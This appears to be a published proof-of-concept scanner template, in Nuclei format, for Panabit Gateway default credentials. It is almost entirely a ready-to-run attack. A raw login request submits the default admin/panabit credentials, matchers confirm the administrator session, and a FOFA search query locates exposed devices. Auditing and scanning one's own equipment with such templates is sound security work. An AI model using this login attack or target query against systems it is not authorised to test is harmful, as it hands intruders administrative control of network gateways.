漏洞描述
Panabit Gateway default credentials were discovered.
panabit-default-login: Panabit Gateway - Default Login
PoC代码[已公开]
id: panabit-default-login
info:
name: Panabit Gateway - Default Login
author: pikpikcu,ritikchaddha
severity: critical
description: Panabit Gateway default credentials were discovered.
reference:
- https://max.book118.com/html/2017/0623/117514590.shtm
- https://en.panabit.com/wp-content/uploads/Panabit-Intelligent-Application-Gateway-04072020.pdf
- https://topic.alibabacloud.com/a/panabit-monitoring-installation-tutorial_8_8_20054193.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-1391
metadata:
verified: true
max-request: 1
fofa-query: app="Panabit-智能网关"
tags: panabit,default-login,intrusive,vuln
http:
- raw:
- |
POST /login/userverify.cgi HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAjZMsILtbrBp8VbC
Referer: {{BaseURL}}/login/login.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
------WebKitFormBoundaryAjZMsILtbrBp8VbC
Content-Disposition: form-data; name="username"
{{username}}
------WebKitFormBoundaryAjZMsILtbrBp8VbC
Content-Disposition: form-data; name="password"
{{password}}
------WebKitFormBoundaryAjZMsILtbrBp8VbC--
payloads:
username:
- admin
password:
- panabit
attack: pitchfork
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<META HTTP-EQUIV=REFRESH CONTENT="0;URL=/index.htm">'
- 'urn:schemas-microsoft-com:vml'
condition: and
- type: word
part: header
words:
- "paonline_admin"
- type: status
status:
- 200
# digest: 4a0a00473045022025ebcaba4d93fe7c9d8c6816e5adc936af3a345b881479ce7a902d7fbe189275022100894f0b42f47b8e7d40e47d4838903e18b216033f42abc41505ff96bcfe7d274b:922c64590222798bb761d5b6d8e72950